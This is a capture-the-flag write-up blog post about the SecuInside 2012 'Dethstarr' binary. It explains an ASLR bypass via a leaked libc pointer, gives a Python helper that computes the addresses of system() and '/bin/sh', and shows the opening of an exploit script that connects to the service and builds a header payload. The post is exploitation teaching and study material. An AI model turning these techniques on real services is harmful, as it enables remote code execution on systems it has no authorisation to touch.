codezen.fr code hacking, zen coding

12 Sep 2012

SecuInside 2012 – Dethstarr binary Write-up

Posted by aXs

Quick solution post for this challenge, kept for future reference.

This is a memory-overwrite exploit. It is a bit convoluted because ASLR was enabled on the target, so before the overwrite can point anywhere useful we need an info leak: one libc address read back from the process, from which the randomised libc base and the offsets of the functions we want inside libc can be computed.
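Before the script itself, here is the ASLR step in isolation, as an added example that is not part of the original write-up. It takes one leaked libc pointer (here a constructed byte string standing in for what the service sends back), subtracts that symbol's static offset to recover the libc base, sanity-checks that the base is page-aligned, and then resolves the other addresses from the same base. The symbol offsets in LIBC_OFFSETS are hypothetical values; on a real target they come from the challenge's own libc (for example `readelf -s libc.so.6`), and the leak position (second dword) is likewise an assumption for the sample.

```python
import struct

# Hypothetical offsets inside the target's libc.so.6, constructed for this
# example. Real values must be read from the exact libc build the challenge runs.
LIBC_OFFSETS = {
    "puts": 0x00067890,
    "system": 0x0003CD10,
    "/bin/sh": 0x0015D8E8,
}

PAGE_SIZE = 0x1000  # 32-bit x86 with 4 KiB pages: a mapped library always starts on a page boundary
MASK32 = 0xFFFFFFFF


def parse_leak(data, offset):
    """Read one little-endian 32-bit pointer out of the bytes the server sent back."""
    if len(data) < offset + 4:
        raise ValueError("leak too short: got %d bytes, need %d" % (len(data), offset + 4))
    return struct.unpack_from("<I", data, offset)[0]


def libc_base(leaked_addr, leaked_symbol, offsets=LIBC_OFFSETS):
    """Recover the randomised libc base from one leaked symbol address.

    ASLR moves the whole library as a unit, so every symbol shares the same
    delta: base = leaked_addr - static_offset(symbol). The result has to be
    page-aligned; if it is not, either the leaked value is not the pointer we
    think it is or the offset table belongs to a different libc build, and
    continuing would only crash the target instead of landing in system().
    """
    base = (leaked_addr - offsets[leaked_symbol]) & MASK32
    if base % PAGE_SIZE:
        raise ValueError(
            "libc base 0x%08x is not page-aligned: wrong leak or wrong libc offsets" % base
        )
    return base


def resolve(base, name, offsets=LIBC_OFFSETS):
    """Runtime address of a libc symbol or string once the base is known."""
    return (base + offsets[name]) & MASK32


def p32(value):
    """Little-endian 32-bit pack, the same byte order the hand-written buffers use."""
    return struct.pack("<I", value & MASK32)


def demo():
    # Constructed sample: pretend the service echoed back 8 bytes whose second
    # dword is puts@libc, with libc randomised to base 0xb75a3000 this run.
    randomised_base = 0xB75A3000
    leak = b"AAAA" + p32(randomised_base + LIBC_OFFSETS["puts"])

    puts_addr = parse_leak(leak, 4)          # assumption: the pointer sits at offset 4
    base = libc_base(puts_addr, "puts")
    return {
        "base": base,
        "system": resolve(base, "system"),
        "binsh": resolve(base, "/bin/sh"),
    }


if __name__ == "__main__":
    for name, addr in sorted(demo().items()):
        print("%-7s 0x%08x" % (name, addr))
```

The alignment check is the part worth keeping in a real exploit: a leak parsed from the wrong offset, or offsets taken from the wrong libc, usually produces a base that fails it, and that is much cheaper to notice locally than by watching the remote process die.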

#!/usr/bin/env python
# SecuInside 2012 - Dethstarr exploit (Python 2)

import socket
import sys
import time
import struct

if len(sys.argv) != 3:
  print '\nUsage:\t./dethhstar.py [host] [port]'
  sys.exit(1)

host = sys.argv[1]
port = int(sys.argv[2])

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)                         # TCP socket to the service
s.connect((host, port))

out = open("buf.bin", "wb")                                                   # local copy of the payload, for debugging

handshake = s.recv(72)
print 'Received', repr(handshake)

# First part of the request: six little-endian dwords, one per check the binary
# performs on the header, in the order the checks appear in the disassembly:
#   cmp eax, 0CAh | test eax, eax | cmp eax, 1 | cmp [ebp+arg_0], 0ACh | cmp [ebp+arg_4], 9Ah | imul/cmp eax, 4Eh / jle
buf = struct.pack('<6I', 0xCA, 0x00, 0x01, 0xAC, 0x9A, 0x01)

# Second part: four little-endian words for the remaining checks:
#   cmp [ebp+var_8], 0 | cmp [ebp+var_C], 0 | cmp [ebp+var_10], 1 | cmp [ebp+var_14], 1
buf += struct.pack('<4H', 0x00, 0x00, 0x01, 0x01)